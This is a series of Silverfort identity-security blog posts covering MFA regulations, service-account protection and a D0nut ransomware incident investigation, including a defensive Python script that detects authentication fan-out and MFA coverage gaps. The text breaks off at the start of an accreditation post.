2. IAM and point identity security solutions are unable to protect many critical resources, including those attackers frequently target in data breaches – such as command-line interfaces, legacy systems, service accounts (non-human identities), file shares, databases, and IT/OT infrastructure. These resources allow attackers to avoid the existing identity security controls, making these controls ineffective.

### Unifying Identity Protection with a Single Platform

Our goal is to develop a platform that unifies identity protection with a single layer that operates on top of all the distributed “silos” of the enterprise identity infrastructure. Our Unified Identity Protection platform extends modern security measures to every identity in the organization, regardless of whether it’s a human or a machine, on-prem or in the cloud, or anything in between. We pioneered a unique architecture that extends identity protection to previously “unprotectable” resources. Imagine enabling security controls like MFA or Zero Trust access policies on legacy systems, service accounts, command-line tools, IT/OT infrastructure and more – it’s now not only possible, but also easy.
Working closely with our customers and partners, we purposely designed our platform to be extremely quick and simple to deploy and use, without the need to modify all these countless systems that we are protecting. There’s no need to install or configure anything on them or to deploy proxies in front of them. This means we can make identity security available everywhere and effectively stop identity threats like account takeover, lateral movement, and ransomware propagation. If you want to learn more, see a demo.

### Leading the Identity Security Market

Looking ahead, we plan to invest heavily in expanding our platform, both by broadening the capabilities of our existing product modules and by developing several new innovative modules to offer the most complete, end-to-end identity protection solution in the market.

I am very excited to welcome Mike Gregoire, Co-Founder and Partner at Brighton Park Capital, to the Silverfort Board of Directors. Mike was previously the CEO of CA Technologies and Taleo, and his experience will help us tremendously as we scale our company to meet customers’ needs and position Silverfort as the leader of the rapidly growing identity security market. I am very excited to partner with Mike and the great team at BPC.

We’re hiring – so if you want to help transform how businesses secure their identities, come join us!

---
- Published: 2024-01-17
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/identity-segmentation-key-in-bolstering-security-posture/

As cyber threats evolve, organizations must constantly adapt their identity security strategies to stay protected. One of the most significant elements of modern security strategies is network segmentation, which involves the division of a network into smaller, isolated segments to limit unauthorized access to sensitive resources.
While network segmentation is well known and implemented by most organizations, the rise of identity threats calls for a more modern approach to segmentation, applied from the identity control plane. This extension of the concept is identity segmentation, which focuses on the identity and attributes of users, devices, and applications. This approach enables organizations to apply granular access controls to specific identities, improving their overall security posture and protection against unauthorized access.

In this blog, we will explore the difference between network segmentation and identity segmentation. We will also explore how identity segmentation is the key to implementing a true Zero Trust strategy.

### The Evolution of Network Segmentation

Network segmentation is a security approach that isolates segments in the enterprise network to reduce the attack surface. It works best in the “castle and moat” enterprise environment, securing all exposure points in the environment, and has been heavily implemented by security and IT teams since the early 2000s. While this approach has proven effective in most network security strategies, the evolving nature of cyber threats highlights gaps in network segmentation.

Network segmentation access policies are typically defined by firewall rules or VLANs, which tend to be static and dependent on network traffic. These static policies depend on the device rather than on the user’s access requirements, often granting broad access to users based on their location within the network. Attackers increasingly target user identities, exploiting compromised credentials to gain unauthorized access. The approach does not adapt to the dynamic nature of modern work environments, where users access resources from a variety of devices and locations. Network segmentation therefore fails to provide the granular control required to secure identities effectively.
### Identity Segmentation Boosts Identity Security Posture

Identity segmentation is the approach to security that involves managing and controlling access based on user identities, roles, and attributes. Instead of relying on rigid network boundaries such as IP access lists and firewall rules, identity segmentation divides the network not just from a physical or geographical standpoint, but also from the perspective of the identity control plane. This is done by segmenting an environment based on the identity and attributes of users, devices, and applications. By doing so, organizations can implement granular access controls, ensuring users only have access to the resources necessary for their roles.

### Network Segmentation vs Identity Segmentation

Network segmentation involves dividing a network into different segments to enhance security and control. Traditional network segmentation relies on factors like IP addresses, VLANs, and physical separation to create these segments. While effective at limiting the impact of a breach within the network, network segmentation often falls short in addressing the dynamic and evolving nature of user identities.

On the other hand, identity segmentation shifts the focus to user identities. This approach aligns with modern security threats, where users are the primary targets and threats often exploit compromised credentials. Identity segmentation involves creating access controls based on user attributes, roles, and behavior, so users can only access the resources necessary for their roles, irrespective of their network location.

The primary difference lies in their focus: network segmentation emphasizes securing pathways and infrastructure, while identity segmentation centers on safeguarding individual user identities. Network segmentation tends to rely on static policies based on network structure, whereas identity segmentation involves dynamic and context-aware access controls based on user attributes.
Identity segmentation is particularly effective in countering identity-based threats, which have become increasingly prevalent in the cybersecurity landscape.

### Adapting to the Zero Trust Architecture

To implement a Zero Trust architecture, all organizations must protect their identities, devices, networks, applications, and workloads, as well as data. It is important to note that while many organizations have successfully implemented a few principles of the Zero Trust model, most still need to strengthen their identity security posture management.

Strong identity management and protection enables organizations to respond more rapidly and precisely when a potential threat arises. IT teams can better track and alert on any identity threats that come up, prompting proactive measures to stop potential unauthorized access attempts.

To construct a complete Zero Trust architecture across your environments, identity management and identity protection must be the core components. This will enable you to manage and protect all aspects of identity effectively, which is essential for safeguarding all types of assets, including those that are on-prem.

---
- Published: 2024-01-10
- Modified: 2025-05-19
- URL: https://www.silverfort.com/blog/healthcare-identity-threats-why-almost-20-of-breaches-lead-to-injury/

The healthcare industry faces significant threats from data breaches and compromised medical devices, resulting not only in high financial losses but also endangering patients’ health. In a survey of US healthcare experts conducted in 2022, 53% reported an increase in mortality rates due to ransomware attacks. In 2021, 30% of cyberattacks targeting healthcare organizations caused disruptions to emergency services. Another 17% led to severe harm to patients.

A recent victim of such a breach was Ardent Health Services. On Thanksgiving Day 2023, a major ransomware attack affected its 30 hospitals and over 200 other healthcare facilities across six US states.
In several cases, ambulances transporting emergency room patients were diverted to other hospitals.

### MFA Does Not Cover Medical Devices

Even though medical devices have a lifetime of up to 30 years, their software and security practices might never be updated. The FBI has identified a growing number of security flaws in such medical devices (referred to as legacy devices), including insulin pumps, defibrillators, and pacemakers. As legacy devices do not support multi-factor authentication (MFA), malicious actors may use compromised credentials to manipulate device readings, administer drug overdoses, or commit other crimes.

### Service Accounts Are Rarely Listed and Documented

Only 10% of healthcare organizations have complete visibility into their service accounts. It is already difficult to manage service accounts, but healthcare organizations face an even greater challenge as they use a wide range of different devices and systems. Often, there may be hundreds of unknown service accounts associated with medical devices or health systems, including the Master Patient Index (MPI), Electronic Health/Medical Records (EHR/EMR), billing, and electronic prescriptions.

### Silverfort’s Unified Identity Protection for Healthcare

Silverfort’s unified identity protection platform automatically detects service accounts and creates access policies based on their behavior. In the event that an access attempt differs from the policy, it will be blocked. Silverfort can also enforce MFA on legacy systems without interfering with their day-to-day operations, preventing malicious authentications for all users, admins, and service accounts across any system, resource, and protocol.

For more information, download our full eBook or request a demo.
---
- Published: 2024-01-03
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-clock-is-ticking-on-ny-dfs-mfa-requirements/

On March 1, 2017, the Department of Financial Services enacted a regulation establishing cybersecurity requirements for financial services companies, 23 NYCRR Part 500 (referred to below as “Part 500” or “the Cybersecurity Regulation”). As a result of investigating hundreds of cybersecurity incidents, Part 500 was amended, increasing the amount and type of security measures organizations are expected to implement to gain sound cyber resilience. This amendment became effective on November 1, 2023.

### What Are the Identity Protection Requirements in the New Amendment?

Section 500.12 of the amended Part 500 states that MFA is required for the following:

- Remote access to the covered entity’s information systems;
- Remote access to third-party applications, including but not limited to cloud-based apps from which nonpublic information is accessible; and
- All privileged accounts other than service accounts that prohibit interactive login.

### Failure To Meet These Requirements Results in Large Fines

The DFS issued this notification on November 23rd, 2023:

> The New York State Department of Financial Services (DFS) today announced that First American Title Insurance Company (First American) will pay a $1 million penalty to New York State for violations of DFS’s Cybersecurity Regulation (23 NYCRR Part 500) stemming from a large-scale cybersecurity breach in May 2019. The breach contributed to the exposure of consumers’ nonpublic information. In addition to penalties, the company has agreed to implement significant remedial measures to better secure consumer data.

There’s no reason to assume that failing to comply with the new amendment will have different results. For that reason alone, it should serve as an incentive to all organizations to fully adjust their defenses to the amended requirements.
### The Identity Protection Implication: Ransomware Spread and Lateral Movement

Privileged accounts are the leading attack surface abused by ransomware actors. Every high-scale ransomware attack seeks to plant a malicious payload in as many machines as possible. The way to achieve that is by compromising the credentials of a privileged account and using it to log in to as many machines as possible. In that sense, the amendment is spot on: placing MFA on all privileged accounts significantly reduces the likelihood of such an attack – as long as it actually covers all of them.

### Not All MFA Solutions Are Born Equal: Checkbox Mindset Can Get You Pwned

The coverage of your chosen MFA solution is critical. Let’s assume you purchase an MFA solution, deploy it based on the MFA vendor’s recommendations, and leave a portion of admin access uncovered. Let’s also assume that this portion will be abused during a cyberattack, exposing the confidential data you’re entrusted with. In that case you’ll probably be found liable, and the fact that the other portion of administrative access was secured will not change a thing.

### 360 Admin Access Coverage: Command-Line Access, Legacy Apps, and IT Infrastructure

You need an MFA solution that can ensure all admin access is protected. There are MFA solutions that struggle with anything beyond web/SaaS, VPN, or RDP. When choosing your solution, make sure it can cover the access methods commonly abused by adversaries. Prominent examples include:

- Command-line access: Command-line access tools such as PsExec and Remote PowerShell are the prime vector adversaries use to gradually spread in a compromised environment.
- File shares: Adversaries abuse file shares to simultaneously plant and execute malicious payloads on multiple machines – a far more efficient method than accessing each machine individually.
- Legacy apps: Many organizations run core operational processes on legacy applications, making them a lucrative target for ransomware actors.
- IT infrastructure: Adversaries strive to gain access to the management interface of an IT or security solution in your environment, as it would give them unlimited access to your resources.

All these examples introduce a significant challenge to most MFA solutions in the market and in many cases are not covered at all. To comply with the amended NY-DFS MFA requirements, you should ensure they are covered and protected.

Learn how Silverfort MFA enables you to meet NY-DFS requirements.

---
- Published: 2023-12-20
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/navigating-essential-8-changes-with-mfa-protection-and-privileged-account-security/

In the ever-evolving landscape of cybersecurity, staying ahead of the game is not just an advantage – it’s a necessity. As of November 2023, the Essential Eight Maturity Model has undergone significant changes, underscoring the critical importance of Multi-Factor Authentication (MFA), securing privileged accounts, and extending MFA to workstations in fortifying your organization against cyber threats. The Australian Cyber Security Centre (ACSC) has outlined these changes in detail, providing a roadmap for businesses and government entities to enhance their cybersecurity postures.

### The Essence of MFA

MFA has emerged as a critical component in safeguarding digital identities. The Essential Eight changes accentuate MFA’s pivotal role in preventing unauthorized access to systems and data. With the increasing sophistication of cyber threats, relying solely on passwords is equivalent to leaving the front door of your digital fortress wide open.

Silverfort, a leading innovator in adaptive risk-based authentication, is uniquely positioned to address the heightened emphasis on MFA. Silverfort’s solution goes beyond conventional MFA protection by seamlessly integrating into your existing infrastructure.
It utilizes adaptive authentication to dynamically assess risk and prompt additional verification when anomalies are detected. This ensures that even if credentials are compromised, unauthorized access is thwarted, aligning with the new Essential Eight guidelines.

### MFA to Workstations with FIDO2 Integration and Desktop Messaging

One of the notable changes in the Essential Eight framework is the emphasis on extending MFA to workstations. Silverfort takes this requirement to the next level with its FIDO2 integration. FIDO2 is an open authentication standard that enables passwordless authentication and reduces the risk of phishing attacks. Silverfort’s FIDO2 integration seamlessly incorporates passwordless authentication for workstations. Employees can use biometric or cryptographic methods, eliminating the reliance on traditional passwords.

What sets Silverfort apart is its additional feature, the Desktop Messaging Service. This service ensures a streamlined user experience by delivering real-time authentication requests directly to users’ desktops. This means that users can conveniently authenticate without having to switch between applications or devices, enhancing both security and user convenience.

### Safeguarding Privileged Accounts with MFA and Service Account Protection

Privileged accounts are the crown jewels of any organization, holding the keys to the kingdom. The Essential Eight changes highlight the urgency of protecting these accounts from exploitation, emphasizing the need for robust controls and monitoring. This is where Silverfort’s Unified Identity Protection Platform shines, offering a comprehensive solution that goes beyond the traditional boundaries.

The Essential Eight changes introduce additional requirements focused on the hardening of administrative infrastructure used by privileged users.
Silverfort’s Unified Identity Protection Platform not only addresses these requirements through MFA protection but also extends its capabilities to include robust Service Account Protection. Service Account Protection is a critical aspect of Silverfort’s solution, ensuring privileged service accounts are secured against compromise. By enforcing the principle of least privilege and continuously monitoring service accounts, Silverfort’s Unified Identity Protection Platform extends beyond traditional security measures. This comprehensive approach minimizes the risk associated with privileged accounts, aligning with the new Essential Eight guidelines.

### Why Silverfort?

With the Essential Eight changes placing a spotlight on MFA, unified identity protection, and extending MFA to workstations, Silverfort stands out as the go-to solution. Its adaptive authentication approach, robust Unified Identity Protection Platform, seamless FIDO2 integration, and innovative Desktop Messaging Service align with the new guidelines, offering a comprehensive and proactive defense against evolving cyber threats.

In a digital landscape where threats are ever-present and regulations are continually evolving, Silverfort provides the security and peace of mind organizations need. Don’t just meet the Essential Eight standards – exceed them with Silverfort, fortifying your organization against the dynamic challenges of the modern cybersecurity landscape.

---
- Published: 2023-12-15
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/finding-the-sweet-spot-how-donut-extortion-group-targets-achilles-heel-in-cybersecurity/

Every organization faces an ongoing battle against cybersecurity threats. Attackers are constantly looking for vulnerabilities to exploit, seeking out the Achilles’ heel that can give them access to your systems and data.
In this blog post, we’ll explore a real-world use case where a cybersecurity extortion group successfully found and exploited our customer’s Achilles’ heels. We’ll take a closer look at the attack and our investigation and provide recommendations to help you protect your organization from similar threats.

### Achilles’ Heel in Cybersecurity

Cybersecurity is an ongoing battle between attackers and network administrators. Attackers are constantly searching for the Achilles’ heel: unpatched networks, unpatched servers, outdated operating systems, users without multi-factor authentication, and so on. Network administrators must pay ongoing attention to identify and remediate all these security gaps.

### Investigation: Following the D0nut’s Crumbs

In this use case, a customer was the target of a ransomware attack by the D0nut extortion group. The group sent an email informing the customer about the attack and claiming to have exfiltrated data and encrypted servers. This group has been known to deploy ransomware in double extortion attacks on enterprises.

Double extortion ransomware is a type of cyberattack in which threat actors exfiltrate a victim’s sensitive data in addition to encrypting it, giving the criminal additional leverage to collect ransom payments. A typical ransomware attack will only encrypt a victim’s data.

Before contacting us, the customer had started an investigation and identified multiple suspected compromised machines, user accounts and encrypted servers. That gave us a set of suspected machines and users, together with an estimated timeframe, to begin the investigation with. We then started looking into the recent behavior of those users and machines.
To make it easier to follow, let’s add some names first:

- Compromised machines: Machine1, Machine2, Machine3
- Compromised users: USER_A, SVC_USER1, SVC_USER2 (initially, only SVC_USER1 was known by the customer to be compromised)
- Encrypted servers: Server1, Server2, Server3

At the beginning of the investigation, we noticed that Machine1 stood out, with an authentication spike that included 1,500 destinations in a short time window. All the authentications were by three users: USER_A, SVC_USER1 and SVC_USER2. Since two of the three users weren’t on the customer’s suspected users list, we immediately notified them and recommended they block their access. This led the customer’s IR team to find that USER_A had downloaded a malicious file to Machine1, making it the attacker’s official starting point.

Another crumb helping the investigation was that Machine1 belongs to a group of Virtual Desktop Infrastructure (VDI) machines, which are internet-facing. This makes them more exposed to remote cybersecurity attacks. Looking at authentications to all the VDIs, we found attempts blocked by MFA on every VDI machine except Machine1. Why? Because Machine1 was the only one not protected by Silverfort’s MFA policy. Due to human error, the customer had missed Machine1 in the protection policy, leaving it as their Achilles’ heel for threat actors to find.

Consequently, the attacker stole the SVC_USER1 and SVC_USER2 credentials from Machine1 and used them to move laterally and compromise two additional machines: Machine2 and Machine3. With our domain authentication visibility, we could see all the abnormal authentications to and from Machine1, Machine2 and Machine3, including authentications to the encrypted servers Server1, Server2 and Server3 on the day before the email was sent.

Combining all the findings, we were able to build a more comprehensive picture of the attack surface to follow D0nut’s actions.
How the D0nut group gained access to Machine1, which wasn’t protected by MFA, and moved laterally across the environment.

### Additional Security Gaps Exploited

Threat actors often search for loopholes to exploit when looking for a remote way into a network. The D0nut extortion group found multiple loopholes in their attack campaign. First, they gained access to the organization’s network through an unprotected internet-facing machine. Second, the attacker needed a user account to steal, so they targeted a contractor’s account, USER_A. Contractors are typically less monitored and protected than regular employees and do not fall under most protection conventions, making them more vulnerable to compromise. Moreover, USER_A was a shadow admin used extensively in the attack, a further security gap that enabled the attacker to stay hidden. As a result, the attacker successfully stole the credentials of SVC_USER1 and SVC_USER2, both service accounts that allowed the attacker to move laterally and compromise more machines.

Service accounts and shadow admins, while different from each other, share a common vulnerability: they are highly privileged user accounts that are difficult to monitor and protect. As a result, they are attractive targets for attackers seeking access to critical systems and data. Despite the risks, the customer in this use case had not implemented any protection for these accounts. This oversight allowed the attackers to leverage both types of accounts to move laterally within the network, furthering their attack and increasing the damage they could cause. With Silverfort’s comprehensive visibility, this breach could have been prevented, and the customer’s systems and data could have remained secure.

All these security gaps are common Achilles’ heels for organizations, so we highly recommend implementing protection on them.
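The two signals that surfaced in the investigation above, the authentication spike from Machine1 across about 1,500 destinations by three accounts and the MFA denials on every VDI host except the one missing from the policy, can be expressed as detection logic over forwarded authentication logs. The following is an added example written for this article, not Silverfort’s code; the event layout, host names, thresholds and the VDI group are constructed assumptions.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication events in the shape an identity platform might
# forward to a SIEM. The field layout, host names and the protection group are
# assumptions for this example, not Silverfort's log format.
# Each event: (timestamp, user, source host, destination host, outcome)
# where outcome is "success" or "mfa_denied".
BASE = datetime(2023, 11, 22, 2, 0, 0)


def build_sample_events():
    """Constructed log: a fan-out burst from one host plus normal background."""
    events = []
    # A noisy source: three accounts reach 60 distinct hosts within 5 minutes.
    users = ["USER_A", "SVC_USER1", "SVC_USER2"]
    for i in range(60):
        events.append((BASE + timedelta(seconds=5 * i), users[i % 3],
                       "Machine1", f"HOST{i:03d}", "success"))
    # A normal workstation touching three servers over the same period.
    for i in range(6):
        events.append((BASE + timedelta(minutes=i), "USER_B", "Workstation7",
                       ["FS01", "MAIL01", "DC01"][i % 3], "success"))
    # Inbound logons to the internet-facing VDI group: denied by MFA on the
    # protected hosts, accepted on the one host missing from the policy.
    for i in range(4):
        t = BASE - timedelta(minutes=30 - i)
        events.append((t, "USER_A", "EXTERNAL", "VDI01", "mfa_denied"))
        events.append((t, "USER_A", "EXTERNAL", "VDI02", "mfa_denied"))
    events.append((BASE - timedelta(minutes=25), "USER_A", "EXTERNAL",
                   "Machine1", "success"))
    return sorted(events, key=lambda e: e[0])


EVENTS = build_sample_events()
VDI_GROUP = {"VDI01", "VDI02", "Machine1"}  # hosts that should all carry MFA


def fan_out_alerts(events, window=timedelta(minutes=10), threshold=50):
    """Sources that reached more than `threshold` distinct destinations inside
    any sliding `window`. Returns {source: (peak distinct destinations, users)}.
    A sliding window keeps a slow, legitimate trickle from triggering."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_src[ev[2]].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        win, in_window, peak = deque(), Counter(), 0
        for ev in evs:
            win.append(ev)
            in_window[ev[3]] += 1
            # Drop events that fell out of the window ending at this event.
            while ev[0] - win[0][0] > window:
                old = win.popleft()
                in_window[old[3]] -= 1
                if in_window[old[3]] == 0:
                    del in_window[old[3]]
            peak = max(peak, len(in_window))
        if peak > threshold:
            alerts[src] = (peak, {e[1] for e in evs})
    return alerts


def mfa_coverage_gaps(events, group):
    """Hosts in `group` that accepted logons but never produced an MFA denial
    while at least one sibling did. Denials on the siblings prove the policy
    is active, so a silent member is the likely hole in the protection group."""
    denied = {e[3] for e in events if e[4] == "mfa_denied" and e[3] in group}
    accepted = {e[3] for e in events if e[4] == "success" and e[3] in group}
    if not denied:
        return set()
    return accepted - denied


if __name__ == "__main__":
    for src, (count, users) in fan_out_alerts(EVENTS).items():
        print(f"fan-out: {src} reached {count} hosts as {sorted(users)}")
    for host in sorted(mfa_coverage_gaps(EVENTS, VDI_GROUP)):
        print(f"coverage gap: {host} accepted logons with no MFA denials")
```

Tune `window` and `threshold` to the fan-out your own domain controllers or jump hosts produce legitimately, otherwise backup and monitoring servers will dominate the alerts.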
### Silverfort Recommendations – Anyone Can Have a D0nut

This showcases just one extortion group looking for an Achilles’ heel in your network – but unfortunately, there are many more. Arm up and protect your organization by implementing Silverfort’s recommendations.

#### 1. Protecting Internet-Facing Machines with MFA

With Silverfort’s MFA policy, you can protect internet-facing machines and servers from malicious connections. One unprotected machine is all it takes for the attacker to get in, as they found the one missing from the protection group due to a human error. In this customer’s use case, we saw how Silverfort was able to block the attacker’s attempts to compromise protected internet-facing machines.

#### 2. Using Your SIEM to Monitor Denied MFAs

Silverfort allows the implementation of multi-factor authentication (MFA) on domain identities, enabling you to have protection and visibility for these identities. You can send the logs Silverfort produces to your SIEM (Security Information and Event Management), which enables another layer of protection. In this use case, if denied MFA had been monitored, the customer would have been able to notice the attempted attack on all VDIs and catch it sooner.

#### 3. Protecting Service Accounts

Silverfort automatically discovers service accounts, learns their behavior, and recommends smart policies. Silverfort’s policies enable the implementation of access management on service accounts, allowing only necessary access and blocking the rest. In addition, Silverfort can alert on or block real-time access attempts that deviate from the expected behavior of each service account, based on Silverfort’s AI risk engine. This allows service accounts to be restricted to their intended purpose with a Zero Trust approach, and enforces an automated response to any unauthorized access attempt without modifying the service accounts or rotating their passwords.
In this use case, if SVC_USER1 and SVC_USER2 had been restricted, the credential theft would have had little to no impact.

#### 4. Shadow Admin Mitigations

Silverfort automatically identifies shadow admin accounts that should be reviewed to determine whether their privileges are legitimate.

Silverfort enables visibility on all Active Directory (AD) and AD entities, including shadow admins. You can have a direct view of why a user is considered a shadow admin and the changes required to have it fixed. If an account’s permissions can’t be changed to avoid the threat, the account can be protected with MFA.

In this use case, if USER_A hadn’t been a shadow admin, it would have been more restricted, making it more difficult for the attacker to move laterally under the radar.

### Don(u)t Know Your Achilles Heel?

In this blog post, I only detailed the relevant security gaps used in this attack path, but many more security gaps can easily turn into your Achilles’ heel. If these gaps apply to your network as well, don’t hesitate – fix them quickly, as this could be you. If you currently don’t have the means to protect these gaps, you can request a demo from Silverfort here.

---
- Published: 2023-12-06
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/understanding-mas-regulations-and-the-imperative-of-service-account-protection/

In the dynamic landscape of financial services, regulatory frameworks play a pivotal role in ensuring stability, security, and fair practices. Singapore, with its reputation as a global financial hub, is no exception. The Monetary Authority of Singapore (MAS) stands at the forefront of regulatory efforts, setting guidelines to safeguard the integrity of the financial system. One crucial aspect that businesses must consider in order to comply with MAS regulations is service account protection.

### MAS Technology Risk Management Guidelines

The Monetary Authority of Singapore (MAS) is Singapore’s central bank and financial regulatory authority.
MAS plays a crucial role in ensuring the stability, integrity, and development of the Singapore financial sector. The regulatory framework established by MAS covers a wide range of financial activities, including banking, insurance, securities, and the broader financial markets.

The Technology Risk Management (TRM) Guidelines are a significant part of MAS regulations. These guidelines are designed to address the challenges and risks associated with the increasing reliance on technology in the financial industry. The TRM Guidelines provide a framework for financial institutions to manage technology risks effectively and ensure technology infrastructure resilience and security.

### MAS Guidelines: The Identity Protection Aspect

As today’s threat landscape continues to evolve, we’re seeing an increasing trend in identity-based attacks that utilize compromised credentials for malicious access to resources. A number of these attacks occur both as standalone malicious acts, such as account takeovers, and as critical components of larger-scale operations, such as lateral movement and ransomware propagation. These identity-based attacks pose a critical business risk in both cases.

Acknowledging the different risks and challenges for financial institutions, the MAS guidelines include a dedicated access control section that explicitly deals with user access management, privileged access management, managing and protecting service accounts, and remote access management. It also makes multiple identity-related references in the context of cyber resilience, incident response, and auditing. Complying with these identity-related principles and practices would materially increase the financial institution’s overall resilience to cyberattacks.

### MAS Highlights the Need for Service Account Protection

One critical aspect of MAS regulations is the focus on privileged access management, which includes the protection of service accounts.
Service accounts are special user accounts created for applications, services, or automated processes to interact with various systems and resources. These accounts often hold elevated privileges so they can perform specific tasks without human intervention; examples include database access, system updates, and integration with external platforms. Despite their significance, service accounts become security risks if they are not adequately protected.

MAS Guidelines Section 9 (Access Control), 9.2.2, states: "System and service accounts are used by operating systems, applications, and databases to interact or access other systems' resources. The FI should establish a process to manage and monitor the use of system and service accounts for suspicious or unauthorised activities."

While MAS regulations acknowledge the importance of service accounts, there is growing recognition that more attention needs to be given to their protection, given the vital role they play in the overall security framework.

### Service Account Protection Is Essential — Not a Nice to Have

Service accounts are non-human or machine-to-machine (M2M) accounts used by applications, systems, and services to perform automated tasks in a network, often with privileged access. Because of the critical role these accounts play in an enterprise environment, service account protection is vital to every cyber security strategy.

If not properly managed, service accounts pose significant risks. An attacker may compromise service accounts, take control of them, and then use their access privileges to move undetected throughout an environment. Service accounts can be inadvertently assigned a level of privilege equivalent to an admin's, which becomes a security issue when admins are not fully aware of the exact behavior and activity of those accounts.
Further, organizations often lack full visibility into service accounts and how they are used, making it difficult to detect unauthorized access or malicious activity. Additionally, service accounts can't be subject to password rotation, for various reasons; for example, their credentials can be embedded in scripts, so rotating their passwords could break critical processes. Service account protection is therefore essential to prevent unauthorized access, detect malicious activity, manage high access privileges, and ensure the secure and efficient operation of automated tasks within a network.

### Silverfort's Service Account Protection Capabilities

Silverfort automates the discovery, access control, and protection of all service accounts in the environment, giving organizations granular visibility into every non-human identity and machine-to-machine authentication, along with its sources, destinations, authentication protocols, and activity volume. Silverfort monitors the behavior of every service account and, upon detecting a risky deviation, can trigger an immediate response by either alerting or blocking access in real time.

*Silverfort's Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info.*

With Silverfort's service account protection capabilities, service account management is automated and simplified, while the risk of security breaches caused by mismanaged service accounts is dramatically reduced. This is how Silverfort automates the entire service account life cycle:

**Automated Discovery**

Automatically discover all service accounts within the environment and map their sources, destinations, privilege levels, and common usage patterns.

**Activity Monitoring**

Continuously monitor service account activity in real time. This includes tracking the usage patterns, access requests, and behavior of each service account.
Any deviation from the service account's standard behavior is immediately identified.

**Real-Time Protection**

Set access policies that alert or block access for single or multiple accounts whenever they deviate from their standard behavior. This prevents adversaries from using service accounts for malicious access, even if they have compromised them.

Want to learn more about how Silverfort can assist you in complying with MAS service account requirements? Schedule a call with one of our experts or fill out this form for a pricing quote.

---

- Published: 2023-11-30
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/service-account-protection-is-a-necessity-not-a-luxury/

The role of service accounts in today's complex enterprise environment cannot be overstated. These non-human or machine-to-machine (M2M) accounts are employed by applications, systems, and services to execute crucial automated tasks within a network. They require access to resources such as databases and file shares to perform their routine tasks. However, if not properly managed, service accounts can pose significant risks, enabling threat actors to exploit compromised credentials, take over these accounts, and move laterally through a network undetected.

### The Role and Risks of Service Accounts

Service accounts are dedicated non-human accounts created by IT administrators to run on different machines or by processes such as software installation. They perform automatic, repetitive, and scheduled actions in the background, usually without human intervention. When a service account is created, it is typically assigned a set of permissions that allow it to perform specific tasks or access specific resources.

However, the features that make service accounts indispensable also make them a potential security risk. It is common for service accounts to be assigned privileged access similar to that of an administrator.
While this access is necessary for the service account to perform its tasks, it can also create a security issue if administrators are not fully aware of the exact behavior and activity of those accounts.

### Service Account Management

To effectively manage service accounts, you must first discover all of the different account types in use. Service accounts can number in the hundreds or even thousands within an organization, making it difficult to keep track of each account and its activity. According to Osterman's report 'The State of the Identity Attack Surface', only 22% of organizations feel that it's extremely important to know which service accounts exist in their environments. Alarmingly, only 19.8% of organizations have complete confidence that they know which service accounts are in use in their environment.

Understanding which service accounts are in your environment and what tasks they perform is critical, as it helps prevent unauthorized access and lateral movement by threat actors. It also enables effective management and security of these accounts, which often have privileged access.

### Full Visibility into Service Accounts

Because organizations lack full visibility into service accounts, it is difficult for them to detect unauthorized access or malicious activity associated with these accounts. According to Osterman's report, only 5.7% of organizations have full visibility into their service accounts. Without full visibility into service accounts and how they are being used, organizations are exposed to security risks, including unauthorized access by threat actors, which can result in lateral movement attacks.

Since only a small percentage of organizations have full visibility into service accounts, service accounts are often seen as low-hanging fruit for attackers looking to gain access to an organization's environment and move laterally.
In most organizations this should be a serious concern for security leaders – yet only 17.9% of organizations are extremely concerned about the lack of visibility into their service accounts.

### Preventing Attacks Using Compromised Service Accounts

The lack of robust security controls to prevent attacks using compromised service accounts is a significant gap in an organization's cybersecurity posture. When these accounts are not properly protected, they become attractive targets for malicious actors seeking unauthorized access. In Osterman's report, only 26.2% of organizations have extreme confidence that their security controls can prevent service accounts from being compromised in real time. Without adequate controls, such as continuous monitoring and strong access policies, compromised service accounts can go undetected, providing threat actors with prolonged access to critical systems and sensitive data. This gap in security controls not only increases the risk of data breaches but also amplifies the potential for operational disruptions and insider threats. Addressing this deficiency is crucial for organizations to fortify their defenses and ensure a resilient security framework against evolving cyber threats.

### Priority & Resources Allocated to Service Account Protection

Osterman's report indicates that 67.9% of organizations are aware of the risks associated with service accounts but place higher priority on other security initiatives. The need to prioritize resources and allocate budget for the protection of service accounts over other security initiatives is rooted in the recognition that they are prime targets for cyber threats. By prioritizing service account protection, organizations mitigate the risk of unauthorized access, data breaches, and operational disruptions.
An investment in comprehensive security measures for service accounts provides a strong foundation for defending against evolving cyber threats and insider threats. Despite the importance of other security projects, securing service accounts is a proactive measure that ensures the least-detected security risks are prioritized, protecting against potential breaches and strengthening your organization's overall identity security posture management.

### The Urgent Need for Service Account Protection

Service accounts, often overlooked in the broader security landscape, wield significant influence over an organization's critical systems and sensitive data. As organizations begin to recognize the risk of leaving them undetected and unmonitored, the need for service account protection will cease to be a discretionary "nice-to-have" measure – and will instead emerge as a cornerstone of cyber security. Neglecting their protection introduces security risks that can lead to unauthorized access, operational disruptions, and potential data breaches.

Recognizing the pivotal role that service accounts play in the identity infrastructure, it's clear that prioritizing resources and allocating budget for their protection is not merely a strategic choice but a fundamental necessity. As cyber threats continue to evolve, investing in service account protection ensures the resilience, integrity, and security of an organization's users and resources, making it an indispensable element of a comprehensive cyber security strategy.

---

- Published: 2023-11-24
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/silverfort-secures-imda-accreditation-setting-new-standards-in-identity-protection/

We are thrilled to announce that Silverfort has been accredited by the Infocomm Media Development Authority (IMDA) in Singapore. Silverfort's accreditation by IMDA demonstrates its commitment to security innovation and strong partnerships, which have contributed to our success.
Since the accreditation process is designed to identify the best solutions in the market, every aspect of Silverfort's business was examined. As IMDA is known for accrediting only the best in their field through its rigorous process, we are pleased to note that Silverfort has been accredited with flying colors. By validating our tech product, market fit, and business model, we've established our credentials to gain more confidence from government and enterprise buyers in Singapore.

### What IMDA Is and the Significance of IMDA Accreditation

